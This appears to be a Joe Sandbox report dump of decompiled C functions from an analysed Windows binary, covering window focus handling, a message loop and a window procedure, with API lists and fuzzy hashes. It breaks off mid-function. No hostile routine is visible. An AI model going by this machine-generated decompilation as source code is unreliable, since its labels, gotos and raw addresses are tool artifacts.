                                                                                                                                                  • API ID: AddressLibraryProcstrlen$FreeInitializeLoadmemsetstrncpy
                                                                                                                                                  • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                  • API String ID: 4028521140-1801489780
                                                                                                                                                  • Opcode ID: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                                                                                                                                  • Instruction ID: 3440e14c815a203a1a78cd3407a2a10063d2b49fea99d3606607f3928df854cf
                                                                                                                                                  • Opcode Fuzzy Hash: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                                                                                                                                  • Instruction Fuzzy Hash: AF419171800208AFDB11EFA5CC45ADE7FB8AF05315F0080BAF554BA292D7B99E14CF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E00405C70(intOrPtr _a4) {
                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                  				struct HWND__* _v12;
                                                                                                                                                  				struct HWND__* _v16;
                                                                                                                                                  				struct HWND__* _v20;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				char _v76;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				struct HWND__* _t38;
                                                                                                                                                  				struct HWND__* _t41;
                                                                                                                                                  
                                                                                                                                                  				_v8 = GetActiveWindow();
                                                                                                                                                  				_t38 = GetFocus();
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				if(IsChild(_v8, _t38) == 0) {
                                                                                                                                                  					_v24 = 0;
                                                                                                                                                  					L8:
                                                                                                                                                  					_push( &_v24);
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						_t26 = EnumChildWindows(_v8, E00405BB5);
                                                                                                                                                  						if(_v16 == 0) {
                                                                                                                                                  							L14:
                                                                                                                                                  							return _t26;
                                                                                                                                                  						}
                                                                                                                                                  						return EnumChildWindows(_v8, E00405BB5,  &_v24);
                                                                                                                                                  					}
                                                                                                                                                  					_t26 = EnumChildWindows(_v8, E00405C1A);
                                                                                                                                                  					if(_v12 != 0 || _v20 == 0) {
                                                                                                                                                  						goto L14;
                                                                                                                                                  					} else {
                                                                                                                                                  						return SetFocus(_v20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_v24 = _t38;
                                                                                                                                                  				_t41 = _t38;
                                                                                                                                                  				if(_t38 == 0) {
                                                                                                                                                  					goto L8;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					L2:
                                                                                                                                                  					GetClassNameA(_t41,  &_v76, 0x32);
                                                                                                                                                  					if(strcmp( &_v76, "MDI_ChildClass") == 0) {
                                                                                                                                                  						_v8 = _t41;
                                                                                                                                                  						if(_t38 == _t41) {
                                                                                                                                                  							_v24 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t41 = GetParent(_t41);
                                                                                                                                                  				} while (_t41 != 0);
                                                                                                                                                  				goto L8;
                                                                                                                                                  			}












                                                                                                                                                  0x00405c7f
                                                                                                                                                  0x00405c88
                                                                                                                                                  0x00405c90
                                                                                                                                                  0x00405c93
                                                                                                                                                  0x00405c96
                                                                                                                                                  0x00405ca1
                                                                                                                                                  0x00405ce6
                                                                                                                                                  0x00405ce9
                                                                                                                                                  0x00405cef
                                                                                                                                                  0x00405cf0
                                                                                                                                                  0x00405d24
                                                                                                                                                  0x00405d29
                                                                                                                                                  0x00405d39
                                                                                                                                                  0x00405d39
                                                                                                                                                  0x00405d39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d33
                                                                                                                                                  0x00405cfa
                                                                                                                                                  0x00405d03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d0a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d0d
                                                                                                                                                  0x00405d03
                                                                                                                                                  0x00405ca5
                                                                                                                                                  0x00405ca8
                                                                                                                                                  0x00405caa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405cac
                                                                                                                                                  0x00405cac
                                                                                                                                                  0x00405cb3
                                                                                                                                                  0x00405ccb
                                                                                                                                                  0x00405ccf
                                                                                                                                                  0x00405cd2
                                                                                                                                                  0x00405cd4
                                                                                                                                                  0x00405cd4
                                                                                                                                                  0x00405cd2
                                                                                                                                                  0x00405cde
                                                                                                                                                  0x00405ce0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetActiveWindow.USER32 ref: 00405C79
                                                                                                                                                  • GetFocus.USER32 ref: 00405C82
                                                                                                                                                  • IsChild.USER32 ref: 00405C99
                                                                                                                                                  • GetClassNameA.USER32(00000000,?,00000032), ref: 00405CB3
                                                                                                                                                  • strcmp.MSVCRT ref: 00405CC2
                                                                                                                                                  • GetParent.USER32(00000000), ref: 00405CD8
                                                                                                                                                  • EnumChildWindows.USER32(00000001,00405C1A,?), ref: 00405CFA
                                                                                                                                                  • SetFocus.USER32(?), ref: 00405D0D
                                                                                                                                                  • EnumChildWindows.USER32(00000001,00405BB5,?), ref: 00405D24
                                                                                                                                                  • EnumChildWindows.USER32(00000001,00405BB5,?), ref: 00405D33
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Child$EnumWindows$Focus$ActiveClassNameParentWindowstrcmp
                                                                                                                                                  • String ID: MDI_ChildClass
                                                                                                                                                  • API String ID: 1831758322-1946758919
                                                                                                                                                  • Opcode ID: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                                                                                                                                  • Instruction ID: d253d9b16c365dcb60b46e847a60c04356fa5ff6473b175f6f9f07f47c3fcc33
                                                                                                                                                  • Opcode Fuzzy Hash: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                                                                                                                                  • Instruction Fuzzy Hash: 1C210C72D04719EBDF11AFA59D488AFBBB8FE44301B20843BE501B2290D7384E51DF5A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E00404F24(long _a4) {
                                                                                                                                                  				struct tagMSG _v32;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				void* _t36;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				long _t45;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				struct HWND__* _t61;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  
                                                                                                                                                  				_t69 = E0040642D( *0x40b430);
                                                                                                                                                  				_t35 =  *(_t69 + 0x54);
                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t36 =  *(_t69 + 0x18);
                                                                                                                                                  					 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
                                                                                                                                                  					if(_t36 == 0) {
                                                                                                                                                  						if(_a4 == 0xffffffff) {
                                                                                                                                                  							GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                  							L15:
                                                                                                                                                  							_t61 = GetActiveWindow();
                                                                                                                                                  							_t40 = E00405D3C(_t63, _t61);
                                                                                                                                                  							if(_t40 == 0) {
                                                                                                                                                  								L17:
                                                                                                                                                  								TranslateMessage( &_v32);
                                                                                                                                                  								DispatchMessageA( &_v32);
                                                                                                                                                  								L18:
                                                                                                                                                  								_t45 =  *((intOrPtr*)(_t69 + 0xc));
                                                                                                                                                  								if(_t45 == 0) {
                                                                                                                                                  									_a4 = _v32.message;
                                                                                                                                                  									 *((intOrPtr*)(_t69 + 0x10)) = _v32.wParam;
                                                                                                                                                  									 *((intOrPtr*)(_t69 + 0x14)) = _v32.lParam;
                                                                                                                                                  								} else {
                                                                                                                                                  									_a4 = _t45;
                                                                                                                                                  									 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                                                                                                                                  								}
                                                                                                                                                  								L21:
                                                                                                                                                  								return _a4;
                                                                                                                                                  							}
                                                                                                                                                  							_push( &_v32);
                                                                                                                                                  							_push(_t40);
                                                                                                                                                  							_push(_t61);
                                                                                                                                                  							if( *0x40a804() != 0) {
                                                                                                                                                  								goto L18;
                                                                                                                                                  							}
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a4 != 0) {
                                                                                                                                                  							if(MsgWaitForMultipleObjects(0, 0, 0, _a4, 0x1ff) == 0x102) {
                                                                                                                                                  								goto L10;
                                                                                                                                                  							}
                                                                                                                                                  							if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                                                                                                                                  								goto L15;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L10:
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					_a4 =  *(_t36 + 4);
                                                                                                                                                  					 *((intOrPtr*)(_t69 + 4)) =  *((intOrPtr*)(_t36 + 8));
                                                                                                                                                  					 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                                                                                                                                  					 *(_t69 + 0x18) =  *_t36;
                                                                                                                                                  					HeapFree( *0x40b0f8, 0, _t36);
                                                                                                                                                  					if( *(_t69 + 0x18) == 0) {
                                                                                                                                                  						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                                                                                                  					}
                                                                                                                                                  					goto L21;
                                                                                                                                                  				}
                                                                                                                                                  				_t57 =  *(_t35 + 0x14);
                                                                                                                                                  				if(_t57 != 0) {
                                                                                                                                                  					HeapFree( *0x40b0f8, 0, _t57);
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree( *0x40b0f8, 0,  *(_t69 + 0x54));
                                                                                                                                                  				 *(_t69 + 0x54) = 0;
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}












                                                                                                                                                  0x00404f3e
                                                                                                                                                  0x00404f40
                                                                                                                                                  0x00404f47
                                                                                                                                                  0x00404f69
                                                                                                                                                  0x00404f69
                                                                                                                                                  0x00404f6c
                                                                                                                                                  0x00404f72
                                                                                                                                                  0x00404faa
                                                                                                                                                  0x00404ff7
                                                                                                                                                  0x00404ffd
                                                                                                                                                  0x00405003
                                                                                                                                                  0x00405006
                                                                                                                                                  0x0040500d
                                                                                                                                                  0x0040501f
                                                                                                                                                  0x00405023
                                                                                                                                                  0x0040502d
                                                                                                                                                  0x00405033
                                                                                                                                                  0x00405033
                                                                                                                                                  0x00405038
                                                                                                                                                  0x00405045
                                                                                                                                                  0x0040504b
                                                                                                                                                  0x00405051
                                                                                                                                                  0x0040503a
                                                                                                                                                  0x0040503a
                                                                                                                                                  0x0040503d
                                                                                                                                                  0x0040503d
                                                                                                                                                  0x00405054
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405054
                                                                                                                                                  0x00405012
                                                                                                                                                  0x00405013
                                                                                                                                                  0x00405014
                                                                                                                                                  0x0040501d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040501d
                                                                                                                                                  0x00404fbc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404fc1
                                                                                                                                                  0x00404fe0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404fef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404ff1
                                                                                                                                                  0x00404fc3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404fc3
                                                                                                                                                  0x00404f77
                                                                                                                                                  0x00404f7d
                                                                                                                                                  0x00404f80
                                                                                                                                                  0x00404f87
                                                                                                                                                  0x00404f90
                                                                                                                                                  0x00404f95
                                                                                                                                                  0x00404f9b
                                                                                                                                                  0x00404f9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f95
                                                                                                                                                  0x00404f49
                                                                                                                                                  0x00404f4e
                                                                                                                                                  0x00404f58
                                                                                                                                                  0x00404f58
                                                                                                                                                  0x00404f64
                                                                                                                                                  0x00404f66
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00404F58
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00404F64
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00404F90
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                                                                                                                                  • GetActiveWindow.USER32 ref: 00404FFD
                                                                                                                                                  • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00405023
                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0040502D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1286715895-0
                                                                                                                                                  • Opcode ID: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                                                                                                                                  • Instruction ID: df21f5fe5c289298ab728cd37bb52f6d8c99b9184479e931f6e0fc541ff44454
                                                                                                                                                  • Opcode Fuzzy Hash: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                                                                                                                                  • Instruction Fuzzy Hash: 14415CB0900706EFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D945CB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                  			E004056EF(struct HWND__* _a4, intOrPtr _a8, struct HDC__* _a12, signed int _a16) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				struct HWND__* _v12;
                                                                                                                                                  				struct tagRECT _v28;
                                                                                                                                                  				signed int* _t95;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  				struct HWND__* _t97;
                                                                                                                                                  				signed int _t98;
                                                                                                                                                  				intOrPtr _t99;
                                                                                                                                                  				struct HBRUSH__* _t100;
                                                                                                                                                  				struct HBRUSH__* _t102;
                                                                                                                                                  				signed short _t110;
                                                                                                                                                  				signed short _t111;
                                                                                                                                                  				signed short _t112;
                                                                                                                                                  				signed short _t113;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				unsigned int _t120;
                                                                                                                                                  				long _t123;
                                                                                                                                                  				struct HWND__* _t125;
                                                                                                                                                  				void* _t131;
                                                                                                                                                  				void* _t134;
                                                                                                                                                  				struct HBRUSH__* _t137;
                                                                                                                                                  				struct HBRUSH__* _t140;
                                                                                                                                                  				void* _t142;
                                                                                                                                                  				void* _t145;
                                                                                                                                                  				struct HWND__* _t147;
                                                                                                                                                  				intOrPtr* _t148;
                                                                                                                                                  				struct HBRUSH__* _t149;
                                                                                                                                                  				struct HBRUSH__* _t150;
                                                                                                                                                  				signed int _t151;
                                                                                                                                                  				signed int _t155;
                                                                                                                                                  				struct HWND__* _t156;
                                                                                                                                                  				signed int* _t157;
                                                                                                                                                  				void* _t172;
                                                                                                                                                  
                                                                                                                                                  				_t148 = 0;
                                                                                                                                                  				_t95 = E0040642D( *0x40b430);
                                                                                                                                                  				_t156 = _a16;
                                                                                                                                                  				_t157 = _t95;
                                                                                                                                                  				_t96 = E0040523F(_a4, _a8, _a12, _t156);
                                                                                                                                                  				if(_t96 != 0xd0d0d0d1) {
                                                                                                                                                  					L105:
                                                                                                                                                  					return _t96;
                                                                                                                                                  				}
                                                                                                                                                  				_t97 = _a4;
                                                                                                                                                  				_v12 = _t97;
                                                                                                                                                  				if(_t97 == 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					_t15 =  &_v8;
                                                                                                                                                  					 *_t15 = _v8 | 0xffffffff;
                                                                                                                                                  					__eflags =  *_t15;
                                                                                                                                                  					L7:
                                                                                                                                                  					_t155 = 0;
                                                                                                                                                  					if(_t148 == 0) {
                                                                                                                                                  						L21:
                                                                                                                                                  						_t98 = _t157[0x14];
                                                                                                                                                  						__eflags = _t98 - _t155;
                                                                                                                                                  						if(_t98 == _t155) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t99 = _a8;
                                                                                                                                                  							_t151 = _v8;
                                                                                                                                                  							_a16 = 0xd0d0d0d1;
                                                                                                                                                  							_t157[1] = _t151;
                                                                                                                                                  							if(_t99 > 0x115) {
                                                                                                                                                  								__eflags = _t99 - 0x332f;
                                                                                                                                                  								if(__eflags > 0) {
                                                                                                                                                  									_t100 = _t99 - 0x3331;
                                                                                                                                                  									__eflags = _t100;
                                                                                                                                                  									if(_t100 == 0) {
                                                                                                                                                  										_t157[3] = 0x3331;
                                                                                                                                                  										L102:
                                                                                                                                                  										_t157[0x15] = _t156;
                                                                                                                                                  										L103:
                                                                                                                                                  										_a16 = _t155;
                                                                                                                                                  										L104:
                                                                                                                                                  										return _a16;
                                                                                                                                                  									}
                                                                                                                                                  									_t102 = _t100 - 1;
                                                                                                                                                  									__eflags = _t102;
                                                                                                                                                  									if(_t102 == 0) {
                                                                                                                                                  										_t157[3] = 0x3332;
                                                                                                                                                  										 *_t157 = _a12;
                                                                                                                                                  										goto L102;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t102 != 0xe;
                                                                                                                                                  									if(_t102 != 0xe) {
                                                                                                                                                  										goto L104;
                                                                                                                                                  									}
                                                                                                                                                  									L98:
                                                                                                                                                  									_push(_t156);
                                                                                                                                                  									_push(_a12);
                                                                                                                                                  									_push(_a8);
                                                                                                                                                  									_push(_a4);
                                                                                                                                                  									_push(_t156);
                                                                                                                                                  									L99:
                                                                                                                                                  									_a16 = E00405625();
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									_t157[3] = 0x332c;
                                                                                                                                                  									 *_t157 = _a12;
                                                                                                                                                  									_t157[2] = _t156;
                                                                                                                                                  									goto L103;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x133;
                                                                                                                                                  								if(_t99 < 0x133) {
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x135;
                                                                                                                                                  								if(_t99 <= 0x135) {
                                                                                                                                                  									goto L98;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x138;
                                                                                                                                                  								if(_t99 == 0x138) {
                                                                                                                                                  									goto L98;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x30d5;
                                                                                                                                                  								if(_t99 == 0x30d5) {
                                                                                                                                                  									PostMessageA(_a4, 0x30d6, _a12, _t156);
                                                                                                                                                  									L63:
                                                                                                                                                  									_a16 = _a16 & 0x00000000;
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x30d6;
                                                                                                                                                  								if(_t99 != 0x30d6) {
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t156 - 0x203;
                                                                                                                                                  								_t157[3] = 0x332e;
                                                                                                                                                  								 *_t157 = _a12;
                                                                                                                                                  								if(_t156 != 0x203) {
                                                                                                                                                  									__eflags = _t156 - 0x206;
                                                                                                                                                  									if(_t156 != 0x206) {
                                                                                                                                                  										__eflags = _t156 - 0x201;
                                                                                                                                                  										if(_t156 != 0x201) {
                                                                                                                                                  											__eflags = _t156 - 0x204;
                                                                                                                                                  											if(_t156 != 0x204) {
                                                                                                                                                  												_t157[3] = _t155;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t157[2] = 1;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t157[2] = _t155;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t157[2] = 3;
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									_t157[2] = 2;
                                                                                                                                                  								}
                                                                                                                                                  								goto L103;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t99 >= 0x114) {
                                                                                                                                                  								goto L98;
                                                                                                                                                  							}
                                                                                                                                                  							_t172 = _t99 - 0x14;
                                                                                                                                                  							if(_t172 > 0) {
                                                                                                                                                  								__eflags = _t99 - 0x15;
                                                                                                                                                  								if(_t99 == 0x15) {
                                                                                                                                                  									__eflags = _t148 - _t155;
                                                                                                                                                  									if(_t148 != _t155) {
                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t148 + 0x1c)) - _t155;
                                                                                                                                                  										if( *((intOrPtr*)(_t148 + 0x1c)) == _t155) {
                                                                                                                                                  											EnumChildWindows(_a4, E004056D9, 0);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x24;
                                                                                                                                                  								if(_t99 == 0x24) {
                                                                                                                                                  									__eflags = _t148 - _t155;
                                                                                                                                                  									if(_t148 == _t155) {
                                                                                                                                                  										goto L104;
                                                                                                                                                  									}
                                                                                                                                                  									_t110 =  *(_t148 + 0x24) & 0x0000ffff;
                                                                                                                                                  									__eflags = _t110 - _t155;
                                                                                                                                                  									if(_t110 != _t155) {
                                                                                                                                                  										 *(_t156 + 0x18) = _t110 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									_t111 =  *(_t148 + 0x26) & 0x0000ffff;
                                                                                                                                                  									__eflags = _t111 - _t155;
                                                                                                                                                  									if(_t111 != _t155) {
                                                                                                                                                  										 *(_t156 + 0x1c) = _t111 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									_t112 =  *(_t148 + 0x28) & 0x0000ffff;
                                                                                                                                                  									__eflags = _t112 - _t155;
                                                                                                                                                  									if(_t112 != _t155) {
                                                                                                                                                  										 *(_t156 + 0x20) = _t112 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									_t113 =  *(_t148 + 0x2a) & 0x0000ffff;
                                                                                                                                                  									__eflags = _t113 - _t155;
                                                                                                                                                  									if(_t113 != _t155) {
                                                                                                                                                  										 *(_t156 + 0x24) = _t113 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									goto L103;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x4e;
                                                                                                                                                  								if(_t99 == 0x4e) {
                                                                                                                                                  									_push(_t156);
                                                                                                                                                  									_push(_a12);
                                                                                                                                                  									_push(0x4e);
                                                                                                                                                  									_push(_a4);
                                                                                                                                                  									_push(_t156->i);
                                                                                                                                                  									goto L99;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t99 - 0x111;
                                                                                                                                                  								if(_t99 != 0x111) {
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								_t149 = _a12;
                                                                                                                                                  								_t118 = E00405625(_t156, _a4, 0x111, _t149, _t156);
                                                                                                                                                  								__eflags = _t118 - 0xd0d0d0d1;
                                                                                                                                                  								if(_t118 != 0xd0d0d0d1) {
                                                                                                                                                  									goto L63;
                                                                                                                                                  								}
                                                                                                                                                  								_t120 = _t149 >> 0x10;
                                                                                                                                                  								__eflags = _t156;
                                                                                                                                                  								if(_t156 == 0) {
                                                                                                                                                  									__eflags = _t120;
                                                                                                                                                  									if(_t120 == 0) {
                                                                                                                                                  										L54:
                                                                                                                                                  										 *_t157 = _t149;
                                                                                                                                                  										L62:
                                                                                                                                                  										_t157[3] = 0x332d;
                                                                                                                                                  										goto L63;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t149 - 0xfa01;
                                                                                                                                                  									if(_t149 != 0xfa01) {
                                                                                                                                                  										__eflags = _t149 - 0xfa02;
                                                                                                                                                  										if(_t149 != 0xfa02) {
                                                                                                                                                  											 *_t157 = _t149 & 0x0000ffff;
                                                                                                                                                  											goto L62;
                                                                                                                                                  										}
                                                                                                                                                  										_push(1);
                                                                                                                                                  										L58:
                                                                                                                                                  										E00405C70();
                                                                                                                                                  										goto L63;
                                                                                                                                                  									}
                                                                                                                                                  									_push(0);
                                                                                                                                                  									goto L58;
                                                                                                                                                  								}
                                                                                                                                                  								_t157[3] = 0x332c;
                                                                                                                                                  								_t157[2] = _t120;
                                                                                                                                                  								_t123 = GetWindowLongA(_t156, 0xfffffff4);
                                                                                                                                                  								__eflags = _t123 - 0xffffd8f0;
                                                                                                                                                  								 *_t157 = _t123;
                                                                                                                                                  								if(_t123 != 0xffffd8f0) {
                                                                                                                                                  									goto L63;
                                                                                                                                                  								}
                                                                                                                                                  								_t149 = _t149 & 0x0000ffff;
                                                                                                                                                  								__eflags = _t149;
                                                                                                                                                  								goto L54;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t172 == 0) {
                                                                                                                                                  								__eflags = _t148 - _t155;
                                                                                                                                                  								if(_t148 != _t155) {
                                                                                                                                                  									__eflags =  *(_t148 + 0x18);
                                                                                                                                                  									if( *(_t148 + 0x18) == 0) {
                                                                                                                                                  										_t125 = _a4;
                                                                                                                                                  										__eflags =  *_t148 - _t125;
                                                                                                                                                  										if( *_t148 == _t125) {
                                                                                                                                                  											_t150 =  *(_t148 + 0x20);
                                                                                                                                                  											__eflags = _t150;
                                                                                                                                                  											if(_t150 != 0) {
                                                                                                                                                  												_a16 = _t150->i(_a12, _t125);
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										GetClientRect(_a4,  &_v28);
                                                                                                                                                  										FillRect(_a12,  &_v28,  *(_t148 + 0x18));
                                                                                                                                                  										_a16 = 1;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								E00405685(_t157, 0xf, _v8);
                                                                                                                                                  								goto L104;
                                                                                                                                                  							}
                                                                                                                                                  							_t131 = _t99 - 3;
                                                                                                                                                  							if(_t131 == 0) {
                                                                                                                                                  								L19:
                                                                                                                                                  								if(_t151 != 0xffffffff) {
                                                                                                                                                  									E00405685(_t157, _a8, _v8);
                                                                                                                                                  									_t155 = 0;
                                                                                                                                                  								}
                                                                                                                                                  								goto L103;
                                                                                                                                                  							}
                                                                                                                                                  							_t134 = _t131;
                                                                                                                                                  							if(_t134 == 0) {
                                                                                                                                                  								__eflags = _v12 - _a4;
                                                                                                                                                  								if(_v12 != _a4) {
                                                                                                                                                  									L25:
                                                                                                                                                  									_a16 = 1;
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t151 - 0xffffffff;
                                                                                                                                                  								if(_t151 == 0xffffffff) {
                                                                                                                                                  									goto L104;
                                                                                                                                                  								}
                                                                                                                                                  								_t137 = _a12 - _t155;
                                                                                                                                                  								__eflags = _t137;
                                                                                                                                                  								if(_t137 == 0) {
                                                                                                                                                  									__eflags =  *(_t148 + 0x2c) - _t155;
                                                                                                                                                  									if( *(_t148 + 0x2c) == _t155) {
                                                                                                                                                  										L36:
                                                                                                                                                  										_push(_v8);
                                                                                                                                                  										L37:
                                                                                                                                                  										_push(5);
                                                                                                                                                  										L38:
                                                                                                                                                  										_push(_t157);
                                                                                                                                                  										E00405685();
                                                                                                                                                  										goto L63;
                                                                                                                                                  									} else {
                                                                                                                                                  										_push(_v8);
                                                                                                                                                  										_t39 = _t148 + 0x2c;
                                                                                                                                                  										 *_t39 =  *(_t148 + 0x2c) & 0x00000000;
                                                                                                                                                  										__eflags =  *_t39;
                                                                                                                                                  										_push(0x3335);
                                                                                                                                                  										L35:
                                                                                                                                                  										_push(_t157);
                                                                                                                                                  										E00405685();
                                                                                                                                                  										goto L36;
